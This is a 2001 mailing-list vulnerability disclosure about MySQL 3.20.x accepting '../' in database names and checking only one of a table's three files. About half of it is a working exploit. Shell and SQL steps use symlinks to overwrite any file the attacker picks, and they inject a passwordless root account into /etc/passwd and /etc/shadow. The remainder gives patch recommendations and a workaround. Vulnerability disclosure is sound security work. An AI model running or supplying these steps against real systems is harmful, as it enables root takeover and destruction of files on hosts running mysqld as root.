Date: Sun, 18 Mar 2001 21:32:37 +0300
From: "Pavlov, Lesha" <[email protected]>
To: [email protected]Subject: potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t expoloit)
Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :
Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.
Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!
Recomendations:
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!
Patches:
not yet
Workaround:
chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.
Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.
Comments:
Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.
